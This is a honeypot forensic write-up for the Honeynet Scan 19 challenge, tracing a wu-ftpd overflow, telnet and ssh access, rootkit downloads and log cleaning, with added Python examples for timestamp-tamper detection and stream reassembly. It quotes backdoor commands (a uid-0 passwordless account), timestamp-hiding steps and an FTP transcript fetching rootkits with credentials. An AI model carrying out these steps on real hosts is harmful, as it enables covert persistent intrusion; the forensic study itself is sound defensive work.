Scan 19 Analysis

by Iftach Amit


The Challenge:

On September 16th a Redhat Linux 6.2 honeypot was compromised. This is the 3rd time this system was compromised by the same intruder. The honeynet is VMware based and uses a modified bash to log to syslog. Syslog is remotely logging to 0.0.0.0 (remote syslog server IP has been replaced). The compromised system has an IP of 192.168.1.102. After successfully breaking into the box, the attacker ended up using 3 modes of connecting and running commands (some of which are encrypted). The attacker also tried to hide some of his edits from the MAC times. Downloads:
scan19.tar.gz, MD5 = 11e0be295d138df14111796a7733a5d2
scan19.zip, MD5 = c065797b3c2ddfad3396e3d4542ed8a7

1. Which vulnerability did the intruder exploit?
2. What ways, and in what order, did the intruder use to connect and run commands on the system?
3. How did the intruder try to hide his edits from the MAC times?
4. The intruder downloaded rootkits, what were they called? Are they new/custom rootkits?
5. Recover (tell how you did it too) the rootkits from the snort binary capture
6. What does the rootkit do to hide the presence of the attacker on the system?
7. What did you learn from this exercise?
8. How long did this challenge take you?

Bonus Questions:
Based on this challenge, write an example letter of notification to the source owner that attacked the system. Include any evidence or logs that you feel important.


The analysis:


First I downloaded the snort log files using wget (a unix utility to retrieve internet content):

$wget http://project.honeynet.org/scans/scan19/scan19.tar.gz
$md5sum scan19.tar.gz
11e0be295d138df14111796a7733a5d2  scan19.tar.gz
$mkdir scan19; cd scan19; tar xzf ../scan19.tar.gz

After downloading the logs, verifying the integrity of the archive and extracting the log files, we start to examine the findings.
This time I will use Ethereal to examine the logs (just to make a difference...), so we fire up Ethereal, load in the log files (remembering to disable name resolution ;) and haul away.

The first thing in newdat3.log, on Sep. 16 at approximately 5am, is a scan (coming from 210.114.220.46) of the machine's port 111 (portmapper) over TCP, which is followed by an RPC portmapper "GETPORT" request for the "STAT" service (over UDP, of course), which is followed by the reply that the STAT service is indeed running, on UDP port 919.

1. Which vulnerability did the intruder exploit?

Following this is the exploit for the STAT service, which is obviously the "standard" buffer overflow and which apparently failed.

After that, there is no significant traffic towards the server until Sep. 17 at around 1am, when a telnet session came in from 217.156.93.166 consisting of login attempts under the nobody and uucp accounts, both of which failed. This was followed by a few attempts to connect to ports 24 and 6666 (the latter a port likely associated with a known Trojan).

Eventually, at 1:55am, the attacker connected from 207.35.251.172 to the ftp service (which announced itself as wu-ftp 2.6.0) and logged in as the user ftp (anonymous). He then used the wu-ftp EXEC buffer overflow to force the ftp service to break down and eventually grant shell access (over the ftp control connection).

2. What ways, and in what order, did the intruder use to connect and run commands on the system?

First he used the ftp control connection he had buffer overflowed. Then he used telnet to log in and install the rootkits. And finally, ssh for the last and final session.
The intruder then used his "shell over ftp" to run commands on the system. After verifying his identity ("id", answered by uid=0, gid=0 etc...) and the users on the system ("w", which showed no users...), the attacker spent a few minutes browsing the filesystem, after which he started making his return easier by deleting the nobody user's password (passwd nobody -d).

3. How did the intruder try to hide his edits from the MAC times?

After that, he decided to try and mask the changes made to /etc/passwd and the /etc directory by using "touch" to copy the timestamps (access and modification times) of the above to temporary files (at /etc/X11/applnk/Internet/.etcpasswd and /etc/X11/applnk/Internet/.etc). The only problem is that he performed the timestamp copying AFTER he had already altered the files once, so this action was futile.
He creates a new user called "dns" with shell access, a home directory of /bin, and root's user id and group id (0):

/usr/sbin/adduser dns -d/bin -u 0 -g 0 -s/bin/bash

and empties that account's password as well:

passwd dns -d

after which he restores the timestamps he saved earlier in the temporary files.
Finally he examines his work in /etc/passwd and exits at 2:26am.
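The following is an added example (not part of this write-up) that replays the edit/save/edit/restore order described above on a constructed scratch file standing in for /etc/passwd, using os.utime() as the equivalent of the attacker's "touch -r". It shows why the saved timestamps were already "new", and the check an investigator can still apply: touch cannot set the inode change time (ctime), so a restored mtime leaves ctime newer than mtime.

```python
import os
import tempfile
import time

def save_timestamps(path):
    """The attacker's `touch -r /etc/passwd tmpfile` step: capture atime/mtime."""
    st = os.stat(path)
    return (st.st_atime_ns, st.st_mtime_ns)

def restore_timestamps(path, saved):
    """The `touch -r tmpfile /etc/passwd` step: write the captured atime/mtime back."""
    os.utime(path, ns=saved)

def append_line(path, line):
    with open(path, "a") as fh:
        fh.write(line + "\n")

def looks_backdated(path):
    """Neither touch nor utime() can set ctime, so a restored (older) mtime
    leaves ctime strictly newer than mtime. That gap is the investigator's tell."""
    st = os.stat(path)
    return st.st_ctime_ns > st.st_mtime_ns

def simulate_intrusion(workdir=None):
    """Replays the edit/save/edit/restore order from the analysis on a scratch
    file (constructed stand-in for /etc/passwd) and reports what is observable."""
    workdir = workdir or tempfile.mkdtemp()
    passwd = os.path.join(workdir, "passwd")
    append_line(passwd, "root:x:0:0:root:/root:/bin/bash")  # pristine file
    original = save_timestamps(passwd)
    time.sleep(1.1)                                  # clock moves past filesystem granularity
    append_line(passwd, "nobody::99:99:Nobody:/:")   # first edit: password field emptied
    saved = save_timestamps(passwd)                  # stamps copied only after that edit
    append_line(passwd, "dns::0:0::/bin:/bin/bash")  # second edit: uid 0 backdoor user
    time.sleep(1.1)
    restore_timestamps(passwd, saved)                # touch -r back from the temp copy
    fresh = os.path.join(workdir, "untouched")
    append_line(fresh, "control file, never restored")
    return {
        "mtime_restored_to_original": os.stat(passwd).st_mtime_ns == original[1],
        "passwd_flagged": looks_backdated(passwd),
        "control_flagged": looks_backdated(fresh),
    }

if __name__ == "__main__":
    print(simulate_intrusion())
```

On Linux the result is {'mtime_restored_to_original': False, 'passwd_flagged': True, 'control_flagged': False}: the saved mtime never matched the pristine file, and the ctime/mtime gap exposes the restore anyway.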

The attacker then logs in using the telnet service, this time using the nobody account whose password he had just removed. He logs in at 2:32am and immediately performs an "su" to dns (without a password, of course...).
He then creates a directory /dev/rd/sdc0 and operates inside it to cover his tracks.

4. The intruder downloaded rootkits, what were they called? Are they new/custom rootkits?

He downloaded a file (rootkit) Zer0.tar.gz from teleport.go.ro after authenticating as "teleport" with a password of "gunoierul". He then downloaded two more files: copy.tar.gz and ooty.tar.gz.

Then he extracted the Zer0.tar.gz file, cd'd into the Zero dir and executed the rootkit's install script "Go". The rootkit seems to be an old rootkit with modifications (the language is Romanian, with some words in German).

5. Recover (tell how you did it too) the rootkits from the snort binary capture

The files were extracted from the snort logs by selecting an ftp DATA connection corresponding to the appropriate file (it can be identified by the RETR ftp control command just before it), then selecting "Follow TCP stream" and saving the output to a file.
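As an added illustration (not from this write-up) of what "Follow TCP stream" does when recovering a transferred file, the code below reassembles one direction of a TCP flow by sequence number, dropping retransmissions and overlap. It assumes raw IPv4/TCP packets without link-layer framing or pcap headers, and the capture is constructed here (server 193.231.236.42 sending to the honeypot, segments out of order, one retransmitted, plus an unrelated control-channel packet).

```python
import struct

HONEYPOT = bytes([192, 168, 1, 102])    # victim from the analysis
SERVER = bytes([193, 231, 236, 42])     # the FTP server the rootkits came from

def build_segment(src, sport, dst, dport, seq, payload):
    """Constructed IPv4+TCP segment (no link layer, zero checksums): sample data only."""
    tcp = struct.pack("!HHIIBBHHH", sport, dport, seq, 0, 5 << 4, 0x18, 65535, 0, 0)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp) + len(payload),
                     0, 0x4000, 64, 6, 0, src, dst)
    return ip + tcp + payload

def parse_segment(pkt):
    """Return ((src, sport, dst, dport), seq, payload) for an IPv4/TCP packet, else None."""
    ihl = (pkt[0] & 0x0F) * 4
    if pkt[9] != 6:                       # not TCP
        return None
    src = ".".join(map(str, pkt[12:16]))
    dst = ".".join(map(str, pkt[16:20]))
    sport, dport, seq, _ack, off = struct.unpack("!HHIIB", pkt[ihl:ihl + 13])
    return (src, sport, dst, dport), seq, pkt[ihl + (off >> 4) * 4:]

def follow_tcp_stream(packets, flow):
    """Reassemble one direction of a flow by sequence number, the way Ethereal's
    'Follow TCP stream' does: order by seq, ignore duplicates and overlapping bytes."""
    segments = {}
    for pkt in packets:
        parsed = parse_segment(pkt)
        if parsed and parsed[0] == flow and parsed[2]:
            segments.setdefault(parsed[1], parsed[2])   # keep the first copy of a retransmit
    data, expected = bytearray(), 0
    for seq in sorted(segments):
        payload = segments[seq]
        if seq < expected:                              # partial overlap: trim the repeated bytes
            payload = payload[expected - seq:]
        data += payload
        expected = max(expected, seq + len(segments[seq]))
    return bytes(data)

def sample_capture():
    """Constructed FTP DATA flow, server:20 -> honeypot:1045, delivered out of order."""
    chunks = [b"#!/bin/sh\n", b"# Go: constructed stand-in", b" for the rootkit installer\n"]
    s0, s1, s2 = 1000, 1000 + len(chunks[0]), 1000 + len(chunks[0]) + len(chunks[1])
    pkts = [build_segment(SERVER, 20, HONEYPOT, 1045, s2, chunks[2]),
            build_segment(SERVER, 20, HONEYPOT, 1045, s0, chunks[0]),
            build_segment(HONEYPOT, 1045, SERVER, 20, 5000, b""),            # bare ACK, other way
            build_segment(SERVER, 20, HONEYPOT, 1045, s1, chunks[1]),
            build_segment(SERVER, 20, HONEYPOT, 1045, s0, chunks[0]),        # retransmission
            build_segment(SERVER, 21, HONEYPOT, 1044, 7000, b"226 Transfer complete.\r\n")]
    return pkts, b"".join(chunks)
```

With a real capture the same logic would sit behind a pcap reader that strips the Ethernet header first; the DATA flow to follow is the one opened right after the RETR command on the control connection.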

6. What does the rootkit do to hide the presence of the attacker on the system?

It deleted lines from the log files configured in syslog (and detected the remote logging... guess how the attacker looked when he saw this...). The log cleaning procedure was run three times (probably until no lines needed to be removed...).
The final access (as mentioned before) has been done using ssh to connect to the server (after installing the backdoor in the ssh daemon of course...), during which the attacker cleaned some of the files he downloaded.

7. What did you learn from this exercise?

Remote logging is too valuable to be neglected. The attacker must have had some time looking at the message that he better have access to the remote logging host...

8. How long did this challenge take you?

Approximately 4-5 hours including the write-up.

Bonus Questions:
Based on this challenge, write an example letter of notification to the source owner that attacked the system. Include any evidence or logs that you feel important.

Dear ____

I would like to inform you that someone from your network has abused his internet access and performed illegal actions against a server in our network.
He has installed Trojans and abused the system.
Much evidence has been gathered that supports this (as you can see below).

We urge you to promptly take care of the person/s responsible for these actions.

Transcripts from the attacker session:

ftp teleport.go.ro

Connected to teleport.go.ro.
220-
220-
220-                           H O M E  .  R  O
220-
220-                 This server is for HOME.RO members only.
220-                  Go to http://www.home.ro/ to register.
220-
220-                      No anonymous access allowed.
220-
220-
220 ProFTPD 1.2.2rc3 Server (HOME.RO Members FTP) [193.231.236.42]
Name (teleport.go.ro:nobody): teleport

331 Password required for teleport.
Password:gunoierul

230 User teleport logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> cd new

250 CWD command successful.
ftp> get Zer0.tar.gz

local: Zer0.tar.gz remote: Zer0.tar.gz
200 PORT command successful.
150 Opening BINARY mode data connection for Zer0.tar.gz (139711 bytes).
226 Transfer complete.
139711 bytes received in 7.76 secs (18 Kbytes/sec)
ftp> get copy.tar.gz

local: copy.tar.gz remote: copy.tar.gz
200 PORT command successful.
150 Opening BINARY mode data connection for copy.tar.gz (265189 bytes).
226 Transfer complete.
265189 bytes received in 14.6 secs (18 Kbytes/sec)
ftp> get ooty.tar.gz

local: ooty.tar.gz remote: ooty.tar.gz
200 PORT command successful.
150 Opening BINARY mode data connection for ooty.tar.gz (14847 bytes).
226 Transfer complete.
14847 bytes received in 0.856 secs (17 Kbytes/sec)
ftp> bye

221 Goodbye.


And an SMTP message sent to the attacker's free webmail:

220-HotMail (NO UCE) ESMTP server ready at Sun, 16 Sep 2001 17:46:55 -0700 
220 ESMTP spoken here
EHLO localhost.localdomain
250-hotmail.com Hello
250-8bitmime
250 SIZE 1572864
MAIL From:<root@localhost.localdomain> SIZE=2794
250 Requested mail action okay, completed
RCPT To:<hatcheryhatched@hotmail.com>
250 Requested mail action okay, completed
DATA
354 Start mail input; end with <CRLF>.<CRLF>
Received: (from root@localhost)
	by localhost.localdomain (8.9.3/8.9.3) id FAA08755;
	Sun, 16 Sep 2001 05:01:57 -0400
Date: Sun, 16 Sep 2001 05:01:57 -0400
From: root <root@localhost.localdomain>
MIME-Version: 1.0
To: hatcheryhatched@hotmail.com
Subject: ns1
Message-ID: <0_8752_1000630917_1@ns1>
Content-ID: <0_8752_1000630917_2@ns1>
Content-type: text/richtext
Content-Transfer-Encoding: quoted-printable

[system information here...]